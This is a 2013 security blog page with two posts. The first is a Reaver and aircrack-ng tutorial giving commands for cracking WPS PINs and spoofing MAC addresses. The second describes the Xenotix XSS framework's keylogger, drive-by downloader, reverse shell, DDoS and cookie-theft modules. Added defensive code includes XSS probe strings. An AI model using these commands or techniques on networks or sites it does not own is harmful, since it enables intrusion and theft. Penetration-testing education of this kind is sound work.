Saturday, 27 April 2013

Reaver WPS Hacking Tutorial Explained

Prerequisites
You must be running Linux
You must have a wireless card capable of raw injection
You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite.
Basic Usage
First, make sure your wireless card is in monitor mode:
# airmon-ng start wlan0
To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually 'mon0', not 'wlan0', although this will vary based on your wireless card/drivers):
# reaver -i mon0 -b 00:01:02:03:04:05
You will probably also want to use -vv to get verbose info about Reaver’s progress:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
Speeding Up the Attack
By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
Another option that can speed up an attack is --dh-small. This option instructs Reaver to use small Diffie-Hellman secret numbers in order to reduce the computational load on the target AP:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
MAC Spoofing
In some cases you may want/need to spoof your MAC address. Reaver supports MAC spoofing with the --mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.
Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card’s physical interface. For example:
# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69
Default Pins
It has been reported that some models/vendors/ISPs all come configured with a default pin. Common pins are 12345670, 00005678, 01230000, etc. Reaver attempts known default pins first.
Errors and Warnings
It is not uncommon to get a few errors or warnings during the attack, usually related to receive timeouts or out of order WPS messages. You may even get these warnings for a few minutes until the pin count starts incrementing again.
However, if your pin count does not increment at all, or increments only occasionally with lots of errors/warnings, answer the following:
Does the target AP support WPS and is WPS enabled?
Did you put your wireless card into monitor mode?
Did you specify the monitor mode interface with the -i option?
Do you have a good signal from the AP?
If you still have problems, you can see if your problem is already listed in the project issue tracker. If not, create a new issue, and be sure to include:
Linux distro, distro version, and architecture (32-bit or 64-bit)
Wireless card and driver
Pcap file demonstrating the issue, if possible

Airodump-ng Explained in Detail.

Airodump-ng Usage
Airodump-ng has the following usage:
airodump-ng <options> <interface name>
Airodump-ng has many different options and we will be covering a great many of them throughout this tutorial. Some of the most common options are:



Prior to running Airodump-ng, your wireless card needs to be in monitor mode. Then, to run a basic sniffing session, the only parameter that needs to be passed is the wireless interface name.
airodump-ng <interface name>
Once Airodump-ng is launched, you will see something similar to this:

This may be confusing but it is really easy to understand.
Airodump-ng breakdown:
As you have seen, Airodump-ng presents a wealth of information while it is running its capture. The top line of the display, beginning at the left, shows the current channel, followed by the elapsed sniffing time, the current date and time, and, interestingly, an indication that a WPA handshake was captured. The significance of this will be covered later, but it means that a 4-way WPA handshake was captured for the access point with the BSSID C8:BC:C8:FE:D9:65.
The Airodump output is separated into two sections. The top portion provides information about the access points that have been detected, along with the encryption in use, network names, etc.
In the lower portion of the output, the BSSID column contains the MAC addresses of the detected access points, with the STATION column containing the MAC addresses of the connected clients.
The table below contains descriptions of all of the Airodump fields.



If you are in an area with many other access points, your Airodump display and capture files will become very cluttered with unwanted data. After doing your initial reconnaissance, you can determine the BSSID of the access point and the channel it's transmitting on and zero in on it specifically.
To sniff the data of an AP on channel 3 with the BSSID of 34:08:04:09:3D:38, you would first place your card in monitor mode on channel 3.



Now, you can launch Airodump-ng with some advanced filtering options to sniff only the traffic for the AP you are interested in by using the following syntax:
airodump-ng -c <Channel> --bssid <BSSID> -w <Capture> <interface name>


As can be seen in the above Airodump output, filtering for a specific access point can make for a much more manageable display and will keep your capture files to a reasonable size.
To further minimize the disk space used by the file capture, you can also include the '--ivs' option.
airodump-ng -c <Channel> --bssid <BSSID> -w <Capture> --ivs <interface name>
This flag stores only the weak initialization vectors and not the full packet. An important point to keep in mind is that the '--ivs' flag should NOT be used if you are attempting to capture a WPA/WPA2 handshake or if you want to use the PTW attack against WEP.
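As an added example, not part of the original tutorial: the capture written with -w also includes a CSV file that mirrors the two halves of the live display (access points first, then stations). The script below parses that layout to list the clients seen per AP and to flag any AP that is still open or on WEP, which is the inventory a defender wants out of a site survey. The CSV text is constructed, and its column layout is assumed to match what airodump-ng writes (check it against your version).

```python
import csv
from typing import Dict, List, Tuple

# Constructed sample laid out like the CSV that `airodump-ng -w <Capture>` writes:
# the access-point section, a blank line, then the station section.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
34:08:04:09:3D:38, 2013-04-27 10:00:01, 2013-04-27 10:05:12,  3,  54, WEP, WEP, , -37, 120, 4021, 0.0.0.0, 9, em3rgency,
C8:BC:C8:FE:D9:65, 2013-04-27 10:00:02, 2013-04-27 10:05:12,  2,  54, WPA2, CCMP, PSK, -41, 118, 0, 0.0.0.0, 6, secnet,
DE:AD:BE:EF:00:01, 2013-04-27 10:01:30, 2013-04-27 10:05:10, 11,  54, OPN, , , -70, 40, 0, 0.0.0.0, 5, guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2013-04-27 10:00:05, 2013-04-27 10:05:11, -50, 310, 34:08:04:09:3D:38, em3rgency
66:77:88:99:AA:BB, 2013-04-27 10:02:00, 2013-04-27 10:05:09, -55, 87, C8:BC:C8:FE:D9:65, secnet
CC:DD:EE:FF:00:11, 2013-04-27 10:03:00, 2013-04-27 10:04:59, -80, 3, (not associated), em3rgency,guest
"""

WEAK_PRIVACY = {"OPN", "WEP"}  # Privacy column values meaning no or broken encryption

def _split_sections(text: str) -> Tuple[List[str], List[str]]:
    """Split the file at the first blank line: AP rows first, station rows second."""
    lines = text.strip().splitlines()
    gap = lines.index("")  # ValueError if the station section is missing
    return lines[:gap], lines[gap + 1:]

def parse_airodump_csv(text: str) -> Tuple[Dict[str, dict], List[dict]]:
    """Return ({bssid: ap_info}, [station_info]) from airodump-ng CSV text."""
    ap_lines, sta_lines = _split_sections(text)
    aps: Dict[str, dict] = {}
    for row in csv.reader(ap_lines[1:], skipinitialspace=True):  # [1:] skips the header
        if len(row) < 14:
            continue
        aps[row[0]] = {"channel": int(row[3]), "privacy": row[5].strip(),
                       "essid": row[13].strip()}
    stations: List[dict] = []
    for row in csv.reader(sta_lines[1:], skipinitialspace=True):
        if len(row) < 6:
            continue
        # probed ESSIDs are themselves comma separated, so the tail is re-joined
        stations.append({"mac": row[0], "bssid": row[5].strip(),
                         "probed": [p.strip() for p in row[6:] if p.strip()]})
    return aps, stations

def weak_aps(aps: Dict[str, dict]) -> List[str]:
    """BSSIDs whose Privacy column shows OPN or WEP: the ones to fix first."""
    return sorted(b for b, ap in aps.items() if ap["privacy"] in WEAK_PRIVACY)

def clients_per_ap(aps: Dict[str, dict], stations: List[dict]) -> Dict[str, List[str]]:
    """Map each detected AP to the station MACs seen associated with it."""
    out: Dict[str, List[str]] = {b: [] for b in aps}
    for sta in stations:
        if sta["bssid"] in out:
            out[sta["bssid"]].append(sta["mac"])
    return out

if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for bssid in weak_aps(aps):
        ap = aps[bssid]
        print(f"{bssid} {ap['essid']!r} ch{ap['channel']} {ap['privacy']}: review this AP")
    for bssid, macs in clients_per_ap(aps, stations).items():
        print(bssid, "clients:", ", ".join(macs) or "none")
```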
No APs or Clients are Shown
• If you have a laptop with a built-in wireless card, ensure it is enabled in the BIOS.
• Make sure your card works in managed mode.
• Try unloading the driver with rmmod and reloading it with modprobe.
Little or No Data Being Captured
• Ensure that you have used the -c or --channel option to specify a single channel. Otherwise, Airodump-ng will hop between the different channels.
• You might need to be physically closer to the AP to get a good quality signal.
• Ensure that you have started your wireless card in monitor mode with Airmon-ng.
• If you are using a Madwifi-ng driver, make sure that there are no other VAPs running. There can be issues when creating a new VAP in monitor mode if there is an existing VAP in managed mode.

Aireplay-ng Explained in Detail

Aireplay-ng is primarily used to generate or accelerate wireless traffic for later use with Aircrack-ng to crack WEP and WPA-PSK keys.
Aireplay-ng supports various attacks such as deauthentication (for the purpose of capturing the 4-way WPA handshake), fake authentication, interactive packet replay, and more.
Aireplay-ng supports the following attacks along with their corresponding numbers:

This section provides a general usage overview as not all options apply to all attacks. See
the command options of the specific attack you wish to use for the relevant details.
aireplay-ng <options> <interface name>
For all attacks, with the exception of deauthentication and fake authentication, you may use the following filters to limit the packets that will be used in the attack. The most commonly used filter option is '-b' to single out a specific AP.

When replaying (injecting) packets, the following options apply. Bear in mind that not every option is relevant for every attack. The specific attack documentation provides examples of the relevant options.

The Aireplay-ng attacks can obtain packets from two sources. The first source is a live flow of packets from your wireless card, whereas the second source is a pre-captured pcap file. The standard pcap format (http://www.tcpdump.org) is recognized by most commercial and open-source traffic capture and analysis tools. Reading from a file is an often-overlooked feature of Aireplay-ng.

The attack modes are specified with the following switches. Numbers can be used instead of the attack names.


The following troubleshooting tips apply to all modes of Aireplay-ng.
Aireplay-ng does not Inject Packets
Ensure that you are using the correct monitor mode interface. Running 'iwconfig' will show the wireless interfaces and their states. For devices using mac80211 drivers, the monitor mode interface is typically named mon0. For users of madwifi-ng drivers, ensure that there are no other VAPs running.
Aireplay-ng Hangs with No Output
If you enter the command and it appears to hang with no output, this is typically due to your wireless card being on a different channel than the access point.
Also, if you have another instance of Aireplay-ng running in background mode, this can cause the second command to hang if the options conflict.
Aireplay-ng “write failed: Cannot allocate memory wi_write(): illegal seek”
When using a wireless card with a Broadcom chipset, you may encounter this bug found in the original bcm43xx patch. You can try using the b43 driver instead of bcm43xx.
Aireplay-ng has Slow Injection “rtc: lost some interrupts at 1024Hz”
If you see that you are injecting packets successfully but very slowly, at around 30 packets per second, and receive the kernel message "rtc: lost some interrupts at 1024Hz", there is no fix other than to start another instance of Aireplay, which should increase the injection rate.

Injection Test Usage
The injection test has the following usage:
aireplay-ng -9 -e <ESSID> -a <AP MAC> -i <interface> <interface name>
Where:
• -9: injection test
• -e: optional ESSID (network name)
• -a: optional AP MAC address
• -i: optional interface name for the two card injection test
• <interface name>: the interface name to use for the test
Important: You must set your card to the desired channel with Airmon-ng prior to running
any of the tests.
The basic injection test determines if your card successfully supports injection. As
mentioned earlier, the wireless card must first be in monitor mode:

Next, the basic injection test is launched using the following syntax:
aireplay-ng -9 <interface name>

Injection Test Results Analysis
• 12:02:10 Injection is working!: This confirms that the wireless card can inject.
• 12:02:11 Found 2 APs: These APs were found either through the broadcast probes or received beacons.
• 12:02:12 34:08:04:09:3D:38 – channel: 3 – ‘em3rgency’: The first AP being tested.
• 12:02:13 Ping (min/avg/max): 1.455ms/4.163ms/12.006ms Power: -37.63: The ping times are calculated.
• 12:02:13 30/30: 100%: The pings had a 100% success rate for the AP.
• 12:02:13 C8:BC:C8:FE:D9:65 – channel: 2 – ‘secnet’: Notice that this AP is on channel 2.

Friday, 26 April 2013

OWASP Xenotix XSS Exploit Framework v3 2013

OWASP Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications. It is basically a payload list based XSS Scanner and XSS Exploitation kit. The exploitation framework will help the penetration testers to create proof of concept attacks on vulnerable web applications.
 

Project Leader(s): Ajin Abraham
Download : https://www.owasp.org/image/3/3d/OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip

Introduction
Cross Site Scripting or XSS vulnerabilities have been reported and exploited since the 1990s. XSS is listed third in the OWASP 2013 web application vulnerabilities list. Cross-site scripting (XSS) is a type of security vulnerability typically found in web applications which allows attackers to inject client-side script into web pages viewed by other users. The execution of the injected code takes place on the client side. A cross site scripting vulnerability can be used by the attacker to bypass the Same Origin Policy (SOP). In the past, the potential of XSS vulnerabilities was not known. XSS was mainly used for stealing cookies and for temporary or permanent defacements and was not considered a high risk vulnerability. But later XSS tunneling and payload delivery showed us the potential of XSS vulnerabilities. Most of the large websites like Google, Facebook, Twitter, Microsoft, and Amazon even now suffer from XSS bugs. That's a brief introduction to XSS.
Some threats posed by XSS
XSS Tunneling: With an XSS Tunnel a hacker can obtain the traffic between the victim and a webserver.
Client side code injection: A hacker can inject malicious code and execute it on the client side.
DoS: A hacker can perform DoS against a remote server or against the client itself.
Cookie Stealing: A hacker can obtain the session cookies or tokens of a victim.
Malware Spreading: A hacker can spread malware through a website which is vulnerable to XSS.
Phishing: A hacker can embed or redirect to a fake page of the website to get the login credentials of the victim.
Defacing: Temporary or permanent defacement of the web application is possible.

What is Xenotix XSS Exploit Framework?
Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications. This tool can inject code into webpages which are vulnerable to XSS. It is basically a payload list based XSS Scanner and XSS Exploitation kit. It provides a penetration tester the ability to test all the XSS payloads available in the payload list against a web application to test for XSS vulnerabilities. The tool supports both a manual mode and an automated time sharing based test mode. The exploitation framework in the tool includes an XSS encoder, a victim side XSS keystroke logger, an Executable Drive-by downloader, an XSS Reverse Shell and an XSS DDoSer. These exploitation tools will help the penetration tester to create proof of concept attacks on vulnerable web applications during the creation of a penetration test report.
Features of Xenotix XSS Exploit Framework
Xenotix XSS Exploit Framework is divided into two modules:

Scanner Module
  • Built in XSS Payloads
  • HTML5 compatible Payload list
  • XSS Auto mode Scanner
  • XSS Multi-Parameter Scanner
  • XSS Fuzzer
Exploitation Framework
  • XSS Keylogger
  • XSS Executable Drive-by downloader
  • XSS Payload Encoder
  • XSS Reverse Shell
  • XSS DDoSer
  • XSS Cookie Thief
1. Scanner Module

Built in Payload List
It has an inbuilt list of over 500 XSS payloads, including HTML5 compatible XSS injection payloads. Most XSS filters are implemented using a String Replace filter, an htmlentities filter or an htmlspecialchars filter. Most of these weakly designed filters can be bypassed by specific XSS payloads present in the inbuilt payload list.
The above chart shows the number of XSS payloads in different XSS scanning tools available on the market. Xenotix XSS Exploit Framework has the world's second largest XSS payload list after IBM AppScan Security, which has 700 million payloads.
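An added example (not code from Xenotix or the original article) of why the 'String Replace' style of filter fails and what the hardened form looks like: a tag-removing blocklist, entity encoding that skips quotes, and full entity encoding are each rendered into the same template in an attribute context and a body context, and the output is checked for markup the template did not contain. The probe strings and the template are constructed for the check.

```python
import html
import re

# Constructed probe strings a tester feeds to an output filter. The first carries
# no <script> tag at all; the second is built to break out of a quoted attribute.
TAG_PROBE = "<img src=x onerror=alert(1)>"
ATTR_PROBE = '" onfocus="alert(1)" autofocus="'

# The template below contains exactly this many '<' and '"' characters on its own.
TEMPLATE_TAGS, TEMPLATE_QUOTES = 2, 2

def blocklist_filter(s: str) -> str:
    """Weak 'String Replace' filter: deletes the literal <script> tag and nothing else."""
    return re.sub(r"</?script>", "", s, flags=re.IGNORECASE)

def escape_without_quotes(s: str) -> str:
    """Entity-encodes < > & but leaves quote characters alone, as some filters do."""
    return html.escape(s, quote=False)

def escape_fully(s: str) -> str:
    """Hardened: encodes < > & and both quote characters."""
    return html.escape(s, quote=True)

def render(display_name: str, comment: str, sanitize) -> str:
    """One quoted-attribute context and one element-body context, both filtered."""
    return f'<span title="{sanitize(display_name)}">{sanitize(comment)}</span>'

def markup_leaked(fragment: str) -> bool:
    """True when the rendered fragment has more tags or quotes than the template alone."""
    return fragment.count("<") > TEMPLATE_TAGS or fragment.count('"') > TEMPLATE_QUOTES

def audit(sanitize) -> dict:
    """Run both probes through a sanitizer, each in the context it targets."""
    return {
        "body_leaks": markup_leaked(render("bob", TAG_PROBE, sanitize)),
        "attribute_leaks": markup_leaked(render(ATTR_PROBE, "hi", sanitize)),
    }

if __name__ == "__main__":
    for fn in (blocklist_filter, escape_without_quotes, escape_fully):
        print(f"{fn.__name__:22} {audit(fn)}")
```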
XSS Scanner Module

XSS Multi-Parameter Scanner


The Multi-Parameter XSS Scanner is for when you have multiple parameters to test for XSS. It can extract the different parameters from the given URL and test them individually. It saves a lot of your time as you don't need to test each parameter separately.
XSS Fuzzer


The XSS Fuzzer is a convenient module to detect hidden XSS as well as other vulnerabilities like HTTP Parameter Pollution. With the Fuzzer, one can conduct out-of-the-box fuzzing to detect hidden vulnerabilities in a web application.

2. Exploitation Framework
XSS Keylogger
The tool includes an inbuilt victim side keylogger which is implemented using JavaScript and PHP. PHP is served with the help of a portable PHP server named QuickPHP by Zach Saw. A JavaScript file is injected into the web application vulnerable to XSS and is presented to the victim. The script captures the keystrokes made by the victim and sends them to a PHP file, which writes the logs to a text file.
XSS Executable Drive-by Downloader

Java Drive-by download can be implemented with Xenotix XSS Exploit Framework. It allows the attacker to download and run a malicious executable file on the victim's system without the victim's knowledge or permission.
You have to specify the URL for the malicious executable, embed the drive-by webpage into an XSS vulnerable page and serve it to your victim. When the victim views the injected page, the Java applet client.jar accesses the command prompt and, with the help of the echo command, writes a script to a Visual Basic Script file named winconfig.vbs in the temp directory (%temp%); cmd.exe then starts winconfig.vbs. The winconfig.vbs downloads the malicious executable specified in the URL to the temp directory, renames it update.exe and finally executes update.exe. The download and execution of the malicious executable happen without the knowledge or permission of the victim.
XSS Payload Encoder
The inbuilt Encoder will allow encoding into different forms to bypass various filters and Web Application Firewalls. The encoder supports Base64 Encoding, URL Encoding, HEX Encoding, HTML Characters Conversion, Character Code Conversion and IP to Dword, Hex and Octal conversions.
XSS Reverse Shell
An XSS Reverse Shell can be implemented with Xenotix XSS Exploit Framework. This is made possible with the help of Java Drive-By. The XSS vulnerable web application, exploited with the injectable scripts generated by XSS Reverse Shell, will when presented to a victim initiate the drive-by download of a reverse TCP connecting shell. After the drive-by download, the reverse shell is executed by the same method used in Java Drive-by.
The advantage of this method is that the reverse shell is downloaded and executed on the victim's system without the victim's knowledge. But for the execution of the reverse shell, a UAC dialog will pop up requesting permission to run the executable. The tool has an inbuilt Listener that listens for the reverse shell. It is designed in a user friendly manner. All you have to do is specify the reverse connection IP and port.
XSS DDoSer


With HTML5 comes great power. We harness the power of HTML5 to abuse Cross Origin Resource Sharing (CORS) and WebSocket to implement a DDoS attack.
WebSocket is a technology that allows web applications to have a bidirectional channel to a URI endpoint. Sockets can send and receive data to and from a web server and respond to the opening or closing of a WebSocket. The XMLHttpRequest is a JavaScript object which is used to exchange data between a server and a browser behind the scenes. This can be used for Cross Origin Resource Sharing (CORS). We can perform a combined and powerful DDoS attack by abusing these two technologies. This module abuses WebSocket and creates numerous socket connections with a target server to slow it down. Along with it, by abusing CORS, the add-on creates numerous fake GET requests to slow down the target server. When we send the first request to the target server and the response contains the 'Access-Control-Allow-Origin' header with a value that restricts cross site requests, then at times the browser refuses to send more requests to the same URL. However, this can be easily bypassed by making every request unique by adding a non-existing query-string parameter with changing values.
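The server-side counterpart to the trick just described, as an added example that is not part of Xenotix or the original article: because every request is made unique by a throwaway query parameter, a detector has to count hits per client and path with the query string stripped; keyed on the full URL it sees one hit per key and flags nothing. The request log, addresses and paths are constructed placeholders.

```python
from collections import defaultdict, deque
from typing import Deque, Dict, List, Tuple
from urllib.parse import urlsplit

# Constructed server-side request log: (seconds since start, client address, request target).
# The first client mimics the cache-busting trick: the same resource fetched 100 times a
# second with a meaningless, ever-changing query parameter. The second client is an
# ordinary browser fetching the same page twice a second.
REQUESTS: List[Tuple[float, str, str]] = sorted(
    [(i * 0.01, "198.51.100.7", f"/api/profile?cb={i}") for i in range(200)]
    + [(i * 0.5, "203.0.113.9", f"/api/profile?cb={i}") for i in range(20)]
)

def normalize_target(target: str, strip_query: bool = True) -> str:
    """Collapse per-request unique query strings onto the path actually being hit."""
    return urlsplit(target).path if strip_query else target

class FloodDetector:
    """Sliding-window counter of requests per (client, normalized path)."""

    def __init__(self, window_s: float = 1.0, threshold: int = 50, strip_query: bool = True):
        self.window_s = window_s
        self.threshold = threshold
        self.strip_query = strip_query
        self._hits: Dict[Tuple[str, str], Deque[float]] = defaultdict(deque)
        self.flagged: set = set()

    def observe(self, ts: float, client: str, target: str) -> bool:
        """Record one request; return True if this key is now over the threshold."""
        key = (client, normalize_target(target, self.strip_query))
        window = self._hits[key]
        window.append(ts)
        while window and ts - window[0] > self.window_s:  # drop hits that aged out
            window.popleft()
        if len(window) > self.threshold:
            self.flagged.add(key)
            return True
        return False

def detect_floods(requests, window_s: float = 1.0, threshold: int = 50,
                  strip_query: bool = True) -> List[Tuple[str, str]]:
    """Replay a log through the detector and return the flagged (client, path) keys."""
    det = FloodDetector(window_s, threshold, strip_query)
    for ts, client, target in requests:
        det.observe(ts, client, target)
    return sorted(det.flagged)

if __name__ == "__main__":
    print("keyed on path:       ", detect_floods(REQUESTS))
    print("keyed on full target:", detect_floods(REQUESTS, strip_query=False))
```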
XSS Cookie Thief


It's the traditional Cookie Stealer, but a bit more advanced and with a real time cookie viewer. This module allows the pentester to create a cookie stealing POC.
Features for the Next Build
The current version of XSS Exploit Framework is based on Internet Explorer's webpage rendering engine, Trident. Since XSS behaves slightly differently in different web browsers, support for the Gecko (used by Mozilla Firefox) and WebKit (used by Chrome, Opera, and Safari) rendering engines will be added in the next build. Support for XSS in POST parameters and XSS testing by modifying the headers will be included in the next build. An XSS Proxy to tunnel the victim-server traffic will be added in future builds. Automatic detection of parameters or variables vulnerable to XSS and DOM Based XSS detection will be added in the next build.
Conclusion
XSS in popular websites is a high security threat. Xenotix XSS Exploit Framework can be used by Security Analysts to perform penetration tests on Web Applications against XSS vulnerabilities and to create POCs with the inbuilt exploitation framework. Most of the security tools related to XSS are either XSS Scanners or XSS Exploitation tools. Xenotix XSS Exploitation Framework is the first of its kind to act both as an XSS vulnerability scanner and as an XSS exploitation framework. Bug bounty programs like the Google Vulnerability Reward Program, Facebook Bounty, Paypal bug bounty, etc. are there. So go XSS hunting and grab your bounty.
About Author
Ajin Abraham is an Information Security Researcher. He is the creator of OWASP Xenotix XSS Exploit Framework. He has published different whitepapers and tools in the scope of Information Security. He is one of the top 10 in Chakravyuh 2012, India's Biggest Ethical Hacking Competition. His areas of interest include web application penetration testing, coding tools, exploit development and fuzzing. He has been a speaker at many security conferences including Defcon Bangalore-India 2012, ClubHack 2012, nullcon Goa 2013, AppSec APAC 2013, Hack Miami 2013, BlackHat Europe 2013 and many more.
